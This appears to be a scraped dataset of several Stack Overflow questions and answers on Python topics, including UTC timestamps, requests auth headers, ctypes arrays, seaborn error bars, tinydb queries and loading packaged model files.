If you need to know the number of seconds from 1970-01-01 rather than a native Python datetime, use this instead:
return (now - datetime.datetime(1970, 1, 1)).total_seconds()
Python has naming conventions that are at odds with what you might be used to in Javascript, see PEP 8. Also, a function that simply returns the result of another function is rather silly; if it's just a matter of making it more accessible, you can create another name for a function by simply assigning it. The first example above could be replaced with:
utc_now = datetime.datetime.utcnow
A:
import datetime
import pytz
# datetime object with timezone awareness:
datetime.datetime.now(tz=pytz.utc)
# seconds from epoch:
datetime.datetime.now(tz=pytz.utc).timestamp()
# ms from epoch:
int(datetime.datetime.now(tz=pytz.utc).timestamp() * 1000)
A:
Timezone aware with zero external dependencies:
from datetime import datetime, timezone
def utc_now():
return datetime.utcnow().replace(tzinfo=timezone.utc)
A:
From datetime.datetime you can already export to timestamps with the strftime method. Following your function example:
import datetime
def UtcNow():
now = datetime.datetime.utcnow()
return int(now.strftime("%s"))
If you want microseconds, you need to change the export string and cast to float like: return float(now.strftime("%s.%f"))
A:
You could use the datetime library to get UTC time, and even local time.
import datetime
utc_time = datetime.datetime.utcnow()
print(utc_time.strftime('%Y%m%d %H%M%S'))
A:
Why are all the replies based on datetime and not time?
I think this is the easier way!
import time
nowgmt = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
print(nowgmt)
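And since the question asks for milliseconds since the Unix epoch, time gives that directly:
import time
ms_since_epoch = int(time.time() * 1000)
print(ms_since_epoch)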
| How to get UTC time in Python? | How do I get the UTC time, i.e. milliseconds since Unix epoch on Jan 1, 1970?
| [
"For Python 2 code, use datetime.utcnow():\nfrom datetime import datetime\ndatetime.utcnow()\n\nFor Python 3, use datetime.now(timezone.utc) (the 2.x solution will technically work, but has a giant warning in the 3.x docs):\nfrom datetime import datetime, timezone\ndatetime.now(timezone.utc)\n\nFor your purposes when you need to calculate an amount of time spent between two dates all that you need is to subtract end and start dates. The results of such subtraction is a timedelta object.\nFrom the python docs:\nclass datetime.timedelta([days[, seconds[, microseconds[, milliseconds[, minutes[, hours[, weeks]]]]]]])\n\nAnd this means that by default you can get any of the fields mentioned in it's definition -\ndays, seconds, microseconds, milliseconds, minutes, hours, weeks. Also timedelta instance has total_seconds() method that:\n\nReturn the total number of seconds contained in the duration.\nEquivalent to (td.microseconds + (td.seconds + td.days * 24 * 3600) *\n106) / 106 computed with true division enabled.\n\n",
"Timezone-aware datetime object, unlike datetime.utcnow():\nfrom datetime import datetime,timezone\nnow_utc = datetime.now(timezone.utc)\n\n\nTimestamp in milliseconds since Unix epoch:\ndatetime.now(timezone.utc).timestamp() * 1000\n\n",
"In the form closest to your original:\nimport datetime\n\ndef UtcNow():\n now = datetime.datetime.utcnow()\n return now\n\nIf you need to know the number of seconds from 1970-01-01 rather than a native Python datetime, use this instead:\nreturn (now - datetime.datetime(1970, 1, 1)).total_seconds()\n\nPython has naming conventions that are at odds with what you might be used to in Javascript, see PEP 8. Also, a function that simply returns the result of another function is rather silly; if it's just a matter of making it more accessible, you can create another name for a function by simply assigning it. The first example above could be replaced with:\nutc_now = datetime.datetime.utcnow\n\n",
"import datetime\nimport pytz\n\n# datetime object with timezone awareness:\ndatetime.datetime.now(tz=pytz.utc)\n\n# seconds from epoch:\ndatetime.datetime.now(tz=pytz.utc).timestamp() \n\n# ms from epoch:\nint(datetime.datetime.now(tz=pytz.utc).timestamp() * 1000) \n\n",
"Timezone aware with zero external dependencies:\nfrom datetime import datetime, timezone\n\ndef utc_now():\n return datetime.utcnow().replace(tzinfo=timezone.utc)\n\n",
"From datetime.datetime you already can export to timestamps with method strftime. Following your function example:\nimport datetime\ndef UtcNow():\n now = datetime.datetime.utcnow()\n return int(now.strftime(\"%s\"))\n\nIf you want microseconds, you need to change the export string and cast to float like: return float(now.strftime(\"%s.%f\")) \n",
"you could use datetime library to get UTC time even local time.\nimport datetime\n\nutc_time = datetime.datetime.utcnow() \nprint(utc_time.strftime('%Y%m%d %H%M%S'))\n\n",
"why all reply based on datetime and not time?\ni think is the easy way !\nimport time\nnowgmt = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(nowgmt)\n\n"
] | [
279,
169,
47,
22,
15,
10,
6,
4
] | [
"To be correct, UTC format needs at least the T letter:\n>>> a=(datetime.datetime.now(timezone.utc))\n>>> a.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n'2022-11-28T16:42:17Z'\n\n"
] | [
-2
] | [
"datetime",
"python"
] | stackoverflow_0015940280_datetime_python.txt |
Q:
Python requests library passing Authorization header with single token, still getting 403
Code-
HEADER= {
'Authorization': f'Token {TOKEN}'
}
resp= requests.request(
"GET",
url,
headers=HEADER
)
Error message-
{'detail': 'Authentication credentials were not provided.'}
resp.request.headers output
{'User-Agent': 'python-requests/2.28.1', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'application/json', 'Connection': 'keep-alive'}
I have tried passing the HEADER dict directly in the request function (with/without f-string),
and directly used .get.
Basically I tried everything mentioned here: Python requests library how to pass Authorization header with single token.
Nothing worked... any idea what might be wrong?
TOKEN is correct.
A:
'Authentication credentials were not provided.' should normally be a 401; a 403 means you don't have permission. Maybe you should talk to the API provider.
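One thing worth ruling out on the client side (a hedged debugging sketch, not a confirmed cause): requests drops the Authorization header when a response redirects to a different host, so inspecting the redirect chain of the final request can show whether the token ever reached the server:
resp = requests.get(url, headers=HEADER)
print(resp.status_code)
for r in resp.history:  # non-empty if the request was redirected
    print(r.status_code, r.url)
# Header actually sent on the final (possibly redirected) request:
print(resp.request.headers.get("Authorization"))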
| Pyhton requests library passing Authorization header with single token, still getting 403 | Code-
HEADER= {
'Authorization': f'Token {TOKEN}'
}
resp= requests.request(
"GET",
url,
headers=HEADER
)
Error message-
{'detail': 'Authentication credentials were not provided.'}
resp.request.headers output
{'User-Agent': 'python-requests/2.28.1', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'application/json', 'Connection': 'keep-alive'}
I have tried passing HEADER dict directly in request function (with/without fstring)
directly used .get
Basically tried everything mentioned here Python requests library how to pass Authorization header with single token
nothing worked...any idea what might be wrong
TOKEN is correct
| [
"'Authentication credentials were not provided.' should be 401, and, 403 means you don't have the permission, maybe you should talk to the api provider.\n"
] | [
0
] | [] | [] | [
"api",
"python",
"python_requests"
] | stackoverflow_0074603592_api_python_python_requests.txt |
Q:
Reading array returned by c function in ctypes
I've got some C code, which I'm trying to access from ctypes in python. A particular function looks something like this:
float *foo(void) {
static float bar[2];
// Populate bar
return bar;
}
I know this isn't an ideal way to write C, but it does the job in this case. I'm struggling to write the Python to get the two floats contained in the response. I'm fine with return values that are single variables, but I can't work out from the ctypes docs how to handle a pointer to an array.
Any ideas?
A:
Specify restype as POINTER(c_float):
import ctypes
libfoo = ctypes.cdll.LoadLibrary('./foo.so')
foo = libfoo.foo
foo.argtypes = ()
foo.restype = ctypes.POINTER(ctypes.c_float)
result = foo()
print(result[0], result[1])
A:
Thanks to @falsetru, I believe I found a somewhat better solution, which takes into account the fact that the C function returns a pointer to two floats:
import ctypes
libfoo = ctypes.cdll.LoadLibrary('./foo.so')
foo = libfoo.foo
foo.argtypes = ()
foo.restype = ctypes.POINTER(ctypes.c_float * 2)
result = foo().contents
print(f'length of the returned list: {len(result)}')
print(result[0], result[1])
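If NumPy is already a dependency, a hedged alternative sketch is to view the returned buffer as an array, reusing the POINTER(c_float) restype from the first answer:
import ctypes
import numpy as np

foo.restype = ctypes.POINTER(ctypes.c_float)
result = np.ctypeslib.as_array(foo(), shape=(2,))  # view over the C buffer
print(result[0], result[1])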
| Reading array returned by c function in ctypes | I've got some C code, which I'm trying to access from ctypes in python. A particular function looks something like this:
float *foo(void) {
static float bar[2];
// Populate bar
return bar;
}
I know this isn't an ideal way to write C, but it does the job in this case. I'm struggling to write the python to get the two floats contained in the response. I'm fine with return values that are single variables, but I can't work out from the ctypes docs how to handle a pointer to an array.
Any ideas?
| [
"Specify restypes as [POINTER][1](c_float):\nimport ctypes\n\nlibfoo = ctypes.cdll.LoadLibrary('./foo.so')\nfoo = libfoo.foo\nfoo.argtypes = ()\nfoo.restype = ctypes.POINTER(ctypes.c_float)\nresult = foo()\nprint(result[0], result[1])\n\n",
"Thanks to @falsetru, believe I found a somehow better solution, which takes into account the fact that the C function returns a pointer to two floats:\nimport ctypes\n\nlibfoo = ctypes.cdll.LoadLibrary('./foo.so')\nfoo = libfoo.foo\nfoo.argtypes = ()\nfoo.restype = ctypes.POINTER(ctypes.c_float * 2)\nresult = foo().contents\n\nprint('length of the returned list: ' + len(result))\nprint(result[0], result[1])\n\n"
] | [
11,
0
] | [] | [] | [
"c",
"ctypes",
"python"
] | stackoverflow_0018044468_c_ctypes_python.txt |
Q:
Shift error bars in seaborn barplot with two categories?
I am trying to plot some error bars on tope of a seaborn bar plot made with catplot as below. DF output from .to_clipboard(sep=',', index=True).
Melted DF:
,Parameter,Output,Sobol index,Value
0,$μ_{max}$,P,Total-effect,0.956747485
1,$μ_{max}$,D,Total-effect,-3.08778755e-08
2,$μ_{max}$,I,Total-effect,0.18009523
3,$μ_{max}$,N,Total-effect,0.234568344
4,$μ_{max}$,Mean,Total-effect,0.3428527570305311
5,$m$,P,Total-effect,0.159805431
6,$m$,D,Total-effect,1.13115268
7,$m$,I,Total-effect,0.256635185
8,$m$,N,Total-effect,0.00556940644
9,$m$,Mean,Total-effect,0.38829067561
10,$\alpha_D$,P,Total-effect,0.00115455519
11,$\alpha_D$,D,Total-effect,-0.000953479004
12,$\alpha_D$,I,Total-effect,0.157263821
13,$\alpha_D$,N,Total-effect,0.197434829
14,$\alpha_D$,Mean,Total-effect,0.08872493154649999
15,$N_{max}$,P,Total-effect,0.112155751
16,$N_{max}$,D,Total-effect,0.795253131
17,$N_{max}$,I,Total-effect,0.380872014
18,$N_{max}$,N,Total-effect,0.384059029
19,$N_{max}$,Mean,Total-effect,0.41808498124999993
20,$\gamma_{cell}$,P,Total-effect,0.237220261
21,$\gamma_{cell}$,D,Total-effect,-0.00380320853
22,$\gamma_{cell}$,I,Total-effect,0.00371553068
23,$\gamma_{cell}$,N,Total-effect,0.0010752371
24,$\gamma_{cell}$,Mean,Total-effect,0.059551955062499995
25,$K_d$,P,Total-effect,0.062129271
26,$K_d$,D,Total-effect,-1.46430838e-12
27,$K_d$,I,Total-effect,0.94771372
28,$K_d$,N,Total-effect,0.985790701
29,$K_d$,Mean,Total-effect,0.4989084229996339
30,$μ_{max}$,P,First-order,0.655145193
31,$μ_{max}$,D,First-order,-6.84274992e-20
32,$μ_{max}$,I,First-order,0.00537009868
33,$μ_{max}$,N,First-order,0.000186118183
34,$μ_{max}$,Mean,First-order,0.16517535246575
35,$m$,P,First-order,0.000688037316
36,$m$,D,First-order,0.379773978
37,$m$,I,First-order,0.0065270132
38,$m$,N,First-order,0.00471697043
39,$m$,Mean,First-order,0.0979264997365
40,$\alpha_D$,P,First-order,5.88800317e-07
41,$\alpha_D$,D,First-order,3.59595179e-21
42,$\alpha_D$,I,First-order,0.00405428355
43,$\alpha_D$,N,First-order,4.23811678e-05
44,$\alpha_D$,Mean,First-order,0.00102431337952925
45,$N_{max}$,P,First-order,0.00369586495
46,$N_{max}$,D,First-order,1.71266774e-09
47,$N_{max}$,I,First-order,0.0150083874
48,$N_{max}$,N,First-order,0.00143697969
49,$N_{max}$,Mean,First-order,0.005035308438166935
50,$\gamma_{cell}$,P,First-order,0.0116538163
51,$\gamma_{cell}$,D,First-order,-8.51017704e-24
52,$\gamma_{cell}$,I,First-order,0.00180446631
53,$\gamma_{cell}$,N,First-order,-1.1891221e-07
54,$\gamma_{cell}$,Mean,First-order,0.0033645409244475
55,$K_d$,P,First-order,0.000593392401
56,$K_d$,D,First-order,1.24032496e-17
57,$K_d$,I,First-order,0.314711173
58,$K_d$,N,First-order,0.393636611
59,$K_d$,Mean,First-order,0.17723529410025002
Err DF:
,Parameter,Output,Error,value
0,$μ_{max}$,P,Total Error,0.00532374344
1,$μ_{max}$,D,Total Error,3.27057237e-08
2,$μ_{max}$,I,Total Error,0.00589710262
3,$μ_{max}$,N,Total Error,0.0114684117
4,$μ_{max}$,Mean,Total Error,0.005672322616430925
5,$m$,P,Total Error,0.00043759689
6,$m$,D,Total Error,0.20494168
7,$m$,I,Total Error,0.00562181392
8,$m$,N,Total Error,0.00280516814
9,$m$,Mean,Total Error,0.0534515647375
10,$\alpha_D$,P,Total Error,0.0005054549
11,$\alpha_D$,D,Total Error,0.00103547316
12,$\alpha_D$,I,Total Error,0.00461107762
13,$\alpha_D$,N,Total Error,0.0048878586
14,$\alpha_D$,Mean,Total Error,0.00275996607
15,$N_{max}$,P,Total Error,0.00278612157
16,$N_{max}$,D,Total Error,0.228255264
17,$N_{max}$,I,Total Error,0.0122461237
18,$N_{max}$,N,Total Error,0.00975799636
19,$N_{max}$,Mean,Total Error,0.0632613764075
20,$\gamma_{cell}$,P,Total Error,0.00183489881
21,$\gamma_{cell}$,D,Total Error,0.00380320865
22,$\gamma_{cell}$,I,Total Error,0.000257448243
23,$\gamma_{cell}$,N,Total Error,0.0014860645
24,$\gamma_{cell}$,Mean,Total Error,0.00184540505075
25,$K_d$,P,Total Error,0.00198581744
26,$K_d$,D,Total Error,4.60436562e-12
27,$K_d$,I,Total Error,0.0061495373
28,$K_d$,N,Total Error,0.0104738223
29,$K_d$,Mean,Total Error,0.004652294261151092
30,$μ_{max}$,P,First Error,0.00251411484
31,$μ_{max}$,D,First Error,5.81033819e-20
32,$μ_{max}$,I,First Error,0.000157513959
33,$μ_{max}$,N,First Error,0.000242607282
34,$μ_{max}$,Mean,First Error,0.00072855902025
35,$m$,P,First Error,0.000102871751
36,$m$,D,First Error,0.114462613
37,$m$,I,First Error,0.000544114122
38,$m$,N,First Error,0.00208775169
39,$m$,Mean,First Error,0.029299337640750003
40,$\alpha_D$,P,First Error,2.85055333e-06
41,$\alpha_D$,D,First Error,2.97531464e-21
42,$\alpha_D$,I,First Error,0.000382494131
43,$\alpha_D$,N,First Error,6.18549533e-05
44,$\alpha_D$,Mean,First Error,0.00011179990940750001
45,$N_{max}$,P,First Error,0.000359843541
46,$N_{max}$,D,First Error,1.71266774e-09
47,$N_{max}$,I,First Error,0.00147221438
48,$N_{max}$,N,First Error,0.000931579111
49,$N_{max}$,Mean,First Error,0.000690909686166935
50,$\gamma_{cell}$,P,First Error,0.000245701873
51,$\gamma_{cell}$,D,First Error,9.57051247e-24
52,$\gamma_{cell}$,I,First Error,0.000318847918
53,$\gamma_{cell}$,N,First Error,1.1718385e-07
54,$\gamma_{cell}$,Mean,First Error,0.0001411667437125
55,$K_d$,P,First Error,0.000284942556
56,$K_d$,D,First Error,2.3820604e-18
57,$K_d$,I,First Error,0.00320241658
58,$K_d$,N,First Error,0.00880561072
59,$K_d$,Mean,First Error,0.0030732424640000006
Code:
# Get dataframes
df = analysis.sensitivity_analysis_result.get_dataframe(analysis.scenario)
err_df = df.melt(id_vars=["Parameter", "Output"], value_vars=["Total Error", "First Error"], var_name="Error")
df = df.melt(id_vars=["Parameter", "Output"], value_vars=["Total-effect", "First-order"], var_name="Sobol index", value_name="Value")
# Plot
grid = sns.catplot(data=df, x="Parameter", y="Value", col="Output", col_wrap=2, hue="Sobol index", kind="bar", aspect=1.8, legend_out=False)
# Add error lines and values
for ax, var in zip(grid.axes.ravel(), ["P", "D", "I", "N"]):
# Error bars
ax.errorbar(x=df[df["Output"] == var]["Parameter"], y=df[df["Output"] == var]["Value"],
yerr=err_df[err_df["Output"] == var]["value"], ecolor='black', linewidth=0, capsize=2)
# Value labels
for c in ax.containers:
if type(c) == matplotlib.container.BarContainer:
ax.bar_label(c, labels=[f'{v.get_height():.2f}' if v.get_height() >= 0.01 else "<0.01" for v in c], label_type='edge')
grid.tight_layout()
The issue I'm facing is that the error bar cap sizes are not centered with the actual bar. Here's the output I get. How can I fix this? The x parameter I pass to error bar is not a float but rather a column from a data frame so it is not obvious to me how to shift it.
A:
You plot categorical values (the x values are strings), the x positions of the (center of the) bar groups and the error bars the way you plotted them are range(n) where n is the number of parameters. These x positions can also be retrieved by ax.xaxis.get_majorticklocs().
To put the error bars in the middle of the bar you need to consider the offset of each bar relative to the center of the bar group. This offset depends on the bar width (default is 0.8) and the number of bars per group. For a generic solution you'll to differentiate between odd and even numbers of bars per group.
The following shows the case for 2 hues or bars per group (df['Sobol index'].nunique() == 2):
# Plot
width = 0.8
grid = sns.catplot(data=df, x="Parameter", y="Value", col="Output", col_wrap=2, hue="Sobol index", kind="bar", aspect=1.8, legend_out=False, width=width)
# Add error lines and values
for ax, var in zip(grid.axes.ravel(), ["P", "D", "I", "N"]):
# Error bars
ticklocs = ax.xaxis.get_majorticklocs()
offset = 0.5 * width / 2 # 2 = number of hues or bars per group
ax.errorbar(x=np.append(ticklocs - offset, ticklocs + offset), y=df[df["Output"] == var]["Value"],
yerr=err_df[err_df["Output"] == var]["value"], ecolor='black', linewidth=0, capsize=2, elinewidth=1)
# Value labels
for c in ax.containers:
if type(c) == matplotlib.container.BarContainer:
ax.bar_label(c, labels=[f'{v.get_height():.2f}' if v.get_height() >= 0.01 else "<0.01" for v in c], label_type='edge')
grid.tight_layout()
| Shift error bars in seaborn barplot with two categories? | I am trying to plot some error bars on tope of a seaborn bar plot made with catplot as below. DF output from .to_clipboard(sep=',', index=True).
Melted DF:
,Parameter,Output,Sobol index,Value
0,$μ_{max}$,P,Total-effect,0.956747485
1,$μ_{max}$,D,Total-effect,-3.08778755e-08
2,$μ_{max}$,I,Total-effect,0.18009523
3,$μ_{max}$,N,Total-effect,0.234568344
4,$μ_{max}$,Mean,Total-effect,0.3428527570305311
5,$m$,P,Total-effect,0.159805431
6,$m$,D,Total-effect,1.13115268
7,$m$,I,Total-effect,0.256635185
8,$m$,N,Total-effect,0.00556940644
9,$m$,Mean,Total-effect,0.38829067561
10,$\alpha_D$,P,Total-effect,0.00115455519
11,$\alpha_D$,D,Total-effect,-0.000953479004
12,$\alpha_D$,I,Total-effect,0.157263821
13,$\alpha_D$,N,Total-effect,0.197434829
14,$\alpha_D$,Mean,Total-effect,0.08872493154649999
15,$N_{max}$,P,Total-effect,0.112155751
16,$N_{max}$,D,Total-effect,0.795253131
17,$N_{max}$,I,Total-effect,0.380872014
18,$N_{max}$,N,Total-effect,0.384059029
19,$N_{max}$,Mean,Total-effect,0.41808498124999993
20,$\gamma_{cell}$,P,Total-effect,0.237220261
21,$\gamma_{cell}$,D,Total-effect,-0.00380320853
22,$\gamma_{cell}$,I,Total-effect,0.00371553068
23,$\gamma_{cell}$,N,Total-effect,0.0010752371
24,$\gamma_{cell}$,Mean,Total-effect,0.059551955062499995
25,$K_d$,P,Total-effect,0.062129271
26,$K_d$,D,Total-effect,-1.46430838e-12
27,$K_d$,I,Total-effect,0.94771372
28,$K_d$,N,Total-effect,0.985790701
29,$K_d$,Mean,Total-effect,0.4989084229996339
30,$μ_{max}$,P,First-order,0.655145193
31,$μ_{max}$,D,First-order,-6.84274992e-20
32,$μ_{max}$,I,First-order,0.00537009868
33,$μ_{max}$,N,First-order,0.000186118183
34,$μ_{max}$,Mean,First-order,0.16517535246575
35,$m$,P,First-order,0.000688037316
36,$m$,D,First-order,0.379773978
37,$m$,I,First-order,0.0065270132
38,$m$,N,First-order,0.00471697043
39,$m$,Mean,First-order,0.0979264997365
40,$\alpha_D$,P,First-order,5.88800317e-07
41,$\alpha_D$,D,First-order,3.59595179e-21
42,$\alpha_D$,I,First-order,0.00405428355
43,$\alpha_D$,N,First-order,4.23811678e-05
44,$\alpha_D$,Mean,First-order,0.00102431337952925
45,$N_{max}$,P,First-order,0.00369586495
46,$N_{max}$,D,First-order,1.71266774e-09
47,$N_{max}$,I,First-order,0.0150083874
48,$N_{max}$,N,First-order,0.00143697969
49,$N_{max}$,Mean,First-order,0.005035308438166935
50,$\gamma_{cell}$,P,First-order,0.0116538163
51,$\gamma_{cell}$,D,First-order,-8.51017704e-24
52,$\gamma_{cell}$,I,First-order,0.00180446631
53,$\gamma_{cell}$,N,First-order,-1.1891221e-07
54,$\gamma_{cell}$,Mean,First-order,0.0033645409244475
55,$K_d$,P,First-order,0.000593392401
56,$K_d$,D,First-order,1.24032496e-17
57,$K_d$,I,First-order,0.314711173
58,$K_d$,N,First-order,0.393636611
59,$K_d$,Mean,First-order,0.17723529410025002
Err DF:
,Parameter,Output,Error,value
0,$μ_{max}$,P,Total Error,0.00532374344
1,$μ_{max}$,D,Total Error,3.27057237e-08
2,$μ_{max}$,I,Total Error,0.00589710262
3,$μ_{max}$,N,Total Error,0.0114684117
4,$μ_{max}$,Mean,Total Error,0.005672322616430925
5,$m$,P,Total Error,0.00043759689
6,$m$,D,Total Error,0.20494168
7,$m$,I,Total Error,0.00562181392
8,$m$,N,Total Error,0.00280516814
9,$m$,Mean,Total Error,0.0534515647375
10,$\alpha_D$,P,Total Error,0.0005054549
11,$\alpha_D$,D,Total Error,0.00103547316
12,$\alpha_D$,I,Total Error,0.00461107762
13,$\alpha_D$,N,Total Error,0.0048878586
14,$\alpha_D$,Mean,Total Error,0.00275996607
15,$N_{max}$,P,Total Error,0.00278612157
16,$N_{max}$,D,Total Error,0.228255264
17,$N_{max}$,I,Total Error,0.0122461237
18,$N_{max}$,N,Total Error,0.00975799636
19,$N_{max}$,Mean,Total Error,0.0632613764075
20,$\gamma_{cell}$,P,Total Error,0.00183489881
21,$\gamma_{cell}$,D,Total Error,0.00380320865
22,$\gamma_{cell}$,I,Total Error,0.000257448243
23,$\gamma_{cell}$,N,Total Error,0.0014860645
24,$\gamma_{cell}$,Mean,Total Error,0.00184540505075
25,$K_d$,P,Total Error,0.00198581744
26,$K_d$,D,Total Error,4.60436562e-12
27,$K_d$,I,Total Error,0.0061495373
28,$K_d$,N,Total Error,0.0104738223
29,$K_d$,Mean,Total Error,0.004652294261151092
30,$μ_{max}$,P,First Error,0.00251411484
31,$μ_{max}$,D,First Error,5.81033819e-20
32,$μ_{max}$,I,First Error,0.000157513959
33,$μ_{max}$,N,First Error,0.000242607282
34,$μ_{max}$,Mean,First Error,0.00072855902025
35,$m$,P,First Error,0.000102871751
36,$m$,D,First Error,0.114462613
37,$m$,I,First Error,0.000544114122
38,$m$,N,First Error,0.00208775169
39,$m$,Mean,First Error,0.029299337640750003
40,$\alpha_D$,P,First Error,2.85055333e-06
41,$\alpha_D$,D,First Error,2.97531464e-21
42,$\alpha_D$,I,First Error,0.000382494131
43,$\alpha_D$,N,First Error,6.18549533e-05
44,$\alpha_D$,Mean,First Error,0.00011179990940750001
45,$N_{max}$,P,First Error,0.000359843541
46,$N_{max}$,D,First Error,1.71266774e-09
47,$N_{max}$,I,First Error,0.00147221438
48,$N_{max}$,N,First Error,0.000931579111
49,$N_{max}$,Mean,First Error,0.000690909686166935
50,$\gamma_{cell}$,P,First Error,0.000245701873
51,$\gamma_{cell}$,D,First Error,9.57051247e-24
52,$\gamma_{cell}$,I,First Error,0.000318847918
53,$\gamma_{cell}$,N,First Error,1.1718385e-07
54,$\gamma_{cell}$,Mean,First Error,0.0001411667437125
55,$K_d$,P,First Error,0.000284942556
56,$K_d$,D,First Error,2.3820604e-18
57,$K_d$,I,First Error,0.00320241658
58,$K_d$,N,First Error,0.00880561072
59,$K_d$,Mean,First Error,0.0030732424640000006
Code:
# Get dataframes
df = analysis.sensitivity_analysis_result.get_dataframe(analysis.scenario)
err_df = df.melt(id_vars=["Parameter", "Output"], value_vars=["Total Error", "First Error"], var_name="Error")
df = df.melt(id_vars=["Parameter", "Output"], value_vars=["Total-effect", "First-order"], var_name="Sobol index", value_name="Value")
# Plot
grid = sns.catplot(data=df, x="Parameter", y="Value", col="Output", col_wrap=2, hue="Sobol index", kind="bar", aspect=1.8, legend_out=False)
# Add error lines and values
for ax, var in zip(grid.axes.ravel(), ["P", "D", "I", "N"]):
# Error bars
ax.errorbar(x=df[df["Output"] == var]["Parameter"], y=df[df["Output"] == var]["Value"],
yerr=err_df[err_df["Output"] == var]["value"], ecolor='black', linewidth=0, capsize=2)
# Value labels
for c in ax.containers:
if type(c) == matplotlib.container.BarContainer:
ax.bar_label(c, labels=[f'{v.get_height():.2f}' if v.get_height() >= 0.01 else "<0.01" for v in c], label_type='edge')
grid.tight_layout()
The issue I'm facing is that the error bar cap sizes are not centered with the actual bar. Here's the output I get. How can I fix this? The x parameter I pass to error bar is not a float but rather a column from a data frame so it is not obvious to me how to shift it.
| [
"You plot categorical values (the x values are strings), the x positions of the (center of the) bar groups and the error bars the way you plotted them are range(n) where n is the number of parameters. These x positions can also be retrieved by ax.xaxis.get_majorticklocs().\nTo put the error bars in the middle of the bar you need to consider the offset of each bar relative to the center of the bar group. This offset depends on the bar width (default is 0.8) and the number of bars per group. For a generic solution you'll to differentiate between odd and even numbers of bars per group.\nThe following shows the case for 2 hues or bars per group (df['Sobol index'].nunique() == 2):\n# Plot\nwidth = 0.8\ngrid = sns.catplot(data=df, x=\"Parameter\", y=\"Value\", col=\"Output\", col_wrap=2, hue=\"Sobol index\", kind=\"bar\", aspect=1.8, legend_out=False, width=width)\n\n# Add error lines and values\nfor ax, var in zip(grid.axes.ravel(), [\"P\", \"D\", \"I\", \"N\"]):\n # Error bars\n ticklocs = ax.xaxis.get_majorticklocs()\n offset = 0.5 * width / 2 # 2 = number of hues or bars per group\n ax.errorbar(x=np.append(ticklocs - offset, ticklocs + offset), y=df[df[\"Output\"] == var][\"Value\"],\n yerr=err_df[err_df[\"Output\"] == var][\"value\"], ecolor='black', linewidth=0, capsize=2, elinewidth=1)\n\n # Value labels \n for c in ax.containers:\n if type(c) == matplotlib.container.BarContainer:\n ax.bar_label(c, labels=[f'{v.get_height():.2f}' if v.get_height() >= 0.01 else \"<0.01\" for v in c], label_type='edge')\n\ngrid.tight_layout()\n\n\n"
] | [
2
] | [] | [] | [
"bar_chart",
"matplotlib",
"python",
"seaborn"
] | stackoverflow_0074540942_bar_chart_matplotlib_python_seaborn.txt |
Q:
TypeError: 'bool' object is not callable in python module tinydb
I have error TypeError: 'bool' object is not callable, when try to use function search in tinydb
My code:
from tinydb import TinyDB, Query
db = TinyDB('db.json')
User = Query()
db.insert({'test': 'signs', 'age': 34})
res = db.search(User.test == 'signs')
print(res)
`
A:
It appears that "test" is a built-in function for a Query object.
Changing test to name or anything else will fix issue.
from tinydb import TinyDB, Query
db = TinyDB('db.json')
User = Query()
db.insert({'name': 'signs', 'age': 34})
res = db.search(User.name == "signs")
print(f"the search: {res}")
print(f"User.test: {User.test}")
Output
the search: [{'name': 'signs', 'age': 34}]
User.test: <bound method Query.test of Query()>
You can also see 'test' listed as an attribute of a Query object buy running dir() on the object you create
>>> from tinydb import TinyDB, Query
>>> User = Query()
>>> dir(User)
['__and__', '__call__', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattr__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__invert__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__or__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_generate_test', '_hash', '_path', '_test', 'all', 'any', 'exists', 'fragment', 'is_cacheable', 'map', 'matches', 'noop', 'one_of', 'search', 'test']
| TypeError: 'bool' object is not callable in python module tinydb | I have error TypeError: 'bool' object is not callable, when try to use function search in tinydb
My code:
from tinydb import TinyDB, Query
db = TinyDB('db.json')
User = Query()
db.insert({'test': 'signs', 'age': 34})
res = db.search(User.test == 'signs')
print(res)
`
| [
"It appears that \"test\" is a built-in function for a Query object.\nChanging test to name or anything else will fix issue.\nfrom tinydb import TinyDB, Query\ndb = TinyDB('db.json')\nUser = Query()\ndb.insert({'name': 'signs', 'age': 34})\nres = db.search(User.name == \"signs\")\nprint(f\"the search: {res}\")\nprint(f\"User.test: {User.test}\")\n\nOutput\nthe search: [{'name': 'signs', 'age': 34}]\nUser.test: <bound method Query.test of Query()>\n\nYou can also see 'test' listed as an attribute of a Query object buy running dir() on the object you create\n>>> from tinydb import TinyDB, Query\n>>> User = Query()\n>>> dir(User)\n['__and__', '__call__', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattr__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__invert__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__or__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_generate_test', '_hash', '_path', '_test', 'all', 'any', 'exists', 'fragment', 'is_cacheable', 'map', 'matches', 'noop', 'one_of', 'search', 'test']\n\n"
] | [
0
] | [] | [] | [
"database",
"python"
] | stackoverflow_0074603001_database_python.txt |
Q:
my own python package - problem with path to model
I published a Python package on pypi.org; the structure looks like this:
/my_package_name-0.0.1
-- README LICENSE ETC..
-- /my_package_name
-- __init__.py
-- train_model.py
-- predict.py
-- /saved_models
-- november_model
In predict.py I have function that loads model:
def my_function():
(some code...)
net.load_model('./saved_models/november_model')
When I try to use the package:
from my_package.predict import my_function
my_function()
I get error that it can't see the model:
OSError: Unable to open file
(unable to open file: name = './saved_models/november_model',
errno = 2, error message = 'No such file or directory', flags = 0, o_flags = 0)
I tried also:
net.load_model('saved_models/november_model')
net.load_model('./saved_models/november_model')
net.load_model('../saved_models/november_model')
I can't figure out the correct path.
A:
The solution was to use importlib.resources in predict.py:
try:
import importlib.resources as pkg_resources
except ImportError:
# Try backported to PY<37 `importlib_resources`.
import importlib_resources as pkg_resources
from my_package import saved_models
and instead of:
net.load_model('saved_models/november_model')
I used:
f = pkg_resources.open_text(saved_models, 'november_model')
net.load_model(f.name)
